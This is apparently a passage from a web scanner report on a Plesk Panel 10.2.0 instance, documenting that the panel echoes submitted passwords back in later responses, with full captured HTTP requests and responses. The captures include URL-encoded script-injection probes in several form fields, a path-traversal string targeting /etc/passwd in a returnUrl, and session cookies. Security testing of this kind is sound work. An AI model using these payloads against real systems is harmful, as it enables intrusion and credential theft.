} else if ('select' == element.tagName.toLowerCase()) {
element.value = defaultValue;
}
}
},
'buttonTitles': {
'yes': localeKeys['buttonConflictYes'],
'no': localeKeys['buttonConflictNo']
}
});
}

function checkShellOptionConflict(option, element, callback) {
var shellEnabledElement = $(optionsElementsPrefix + 'shellEnabled');
var shellEnabled = shellEnabledElement && shellEnabledElement.checked || !shellEnabledElement;

if (shellEnabled && element.value != '/bin/false' && element.value != 'Login Disabled') {
defaultValue = optionsDefaults[option];
callback(element, defaultValue, function() {
if ('off' == defaultValue || '' == defaultValue) {
if (shellEnabledElement) {
shellEnabledElement.checked = false;
$(optionsElementsPrefix + 'shell').disable();
} else {
// first value is "disable shell", so it's ok
defaultValue = element.options.first().value;
element.value = defaultValue;
}
} else {
element.value = defaultValue;
}
});
}
}

function checkOptionConflict(element, callback) {
var option = element.id.split('-').last().underscore();

if ('input' == element.tagName.toLowerCase() && 'checkbox' == element.type) {
if (!element.checked && ('1' == optionsDefaults[option] || 'on' == optionsDefaults[option])) {
callback(element, true);
} else if (element.checked && ('' == optionsDefaults[option] || 'off' == optionsDefaults[option])) {
callback(element, false);
}
} else if ('select' == element.tagName.toLowerCase()) {
if ('any' != optionsDefaults[option] && element.value != optionsDefaults[option]) {
if (option == 'shell') {
checkShellOptionConflict(option, element, callback);
} else {
callback(element, optionsDefaults[option]);
}
}
}
}

var optionsElements = [];

optionsNames.each(function(option) {
var element = $(optionsElementsPrefix + option.dasherize().camelize());

if (!element) {
if ('ssl' == option) {
element = $('sslSettings-ssl');
} else if ('write_modify' == option) {
element = $(optionsElementsPrefix + 'write_modify');
} else if ('iis_app_pool' == option) {
element = $('tabs-performanceTab-performanceSubForm-iis_app_pool');
}
}

if (!element) {
return ;
}

optionsElements.push(element);
});

optionsElements.each(function(element) {
var eventType = ('select' == element.tagName.toLowerCase()) ? 'change' : 'click';
element.observe(eventType, function(event) {
if (insecureHostingOptionsElement && insecureHostingOptionsElement.checked) {
return ;
}

checkOptionConflict(element, optionConflictWarning);
});
});

var shellEnabledElement = $(optionsElementsPrefix + 'shellEnabled');
var shellElement = $(optionsElementsPrefix + 'shell');
if (shellEnabledElement) {
shellEnabledElement.observe('click', function(event) {
if (insecureHostingOptionsElement && insecureHostingOptionsElement.checked) {
return;
}

if (shellEnabledElement.checked && ('' == optionsDefaults['shell'] || 'off' == optionsDefaults['shell'])) {
optionConflictWarning(shellEnabledElement, false, function() {
shellEnabledElement.checked = false;
shellElement.disable();
});
}
});
}

var formElement = $$('button[name="send"]').first().up('form');
var origSubmitHandler = formElement.submit;

formElement.submit = function() {
if ((insecureHostingOptionsElement && insecureHostingOptionsElement.checked)
|| ($(optionsElementsPrefix + 'hostingEnabled') && !$(optionsElementsPrefix + 'hostingEnabled').checked)
) {
return origSubmitHandler();
}

var conflictsFound = false;
var conflictOptionsHtml = '<ul class="ul">';

optionsElements.each(function(element) {
checkOptionConflict(element, function() {
var option = element.id.split('-').last().underscore();
conflictOptionsHtml += '<li>' + localeKeys['option_' + option] + '</li>';
conflictsFound = true;
});
});

conflictOptionsHtml += '</ul>';

if (!conflictsFound) {
return origSubmitHandler();
}

Jsw.messageBox.show({
'type': Jsw.messageBox.TYPE_YESNO,
'subtype': 'confirm',
'text': localeKeys['foundConflictOptionsTitle'],
'description': localeKeys['foundConflictOptionsDescription'] + conflictOptionsHtml,
'descriptionWrapperTag': 'div',
'onYesClick': function() {
origSubmitHandler();
},
'buttonTitles': {
'yes': localeKeys['buttonConflictYes'],
'no': localeKeys['buttonConflictNo']
}
});

return false;
}

function applySecureSettings() {
optionsElements.each(function(element) {
var option = element.id.split('-').last().underscore();

if ('shell' == option && ('' == optionsDefaults[option] || 'off' == optionsDefaults[option])) {
if ($(optionsElementsPrefix + 'shellEnabled')) {
$(optionsElementsPrefix + 'shellEnabled').checked = false;
$(optionsElementsPrefix + 'shell').disable();
}
} else if ('input' == element.tagName.toLowerCase() && 'checkbox' == element.type) {
if ('1' == optionsDefaults[option] || 'on' == optionsDefaults[option]) {
element.checked = true;
} else if ('' == optionsDefaults[option] || 'off' == optionsDefaults[option]) {
element.checked = false;
}

// invert the value and simulate the selection by click to fire event observers
element.checked = !element.checked;
element.click();
} else if ('select' == element.tagName.toLowerCase()) {
if ('any' != optionsDefaults[option]) {
element.value = optionsDefaults[option];
}
}
});
} }

});
//]]>
</script>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

4. Password returned in later response  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue description

Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.

Issue remediation

There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.

Request 1

POST /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBAmLYTA3n6e9qKZE
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 1632

------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="DRIVER"

SQL Server
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="SERVER"

(local)
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="UID"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="PWD"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="DATABASE"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="APP"

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="LANGUAGE"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="OEMTOANSI"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="cmd"

check
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE
Content-Disposition: form-data; name="wizaction"


------WebKitFormBoundaryBAmLYTA3n6e9qKZE--

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:10:12 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:10:17 GMT
Connection: close
Content-Length: 18522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"><DIV class="msg-box msg-error"><DIV><DIV><DIV><DIV><DIV><DIV class="msg-content"><SPAN class="title">Error:&nbsp;</SPAN>Unable to connect to the data source using the defined settings. Server has returned the following error: <br />
ODBCError 28000: [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user &#039;C332904E1C524819CF332904E&#039;.</DIV></DIV></DIV></DIV></DIV></DIV></DIV></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:32:23 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:32:23 GMT
Connection: close
Content-Length: 18067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

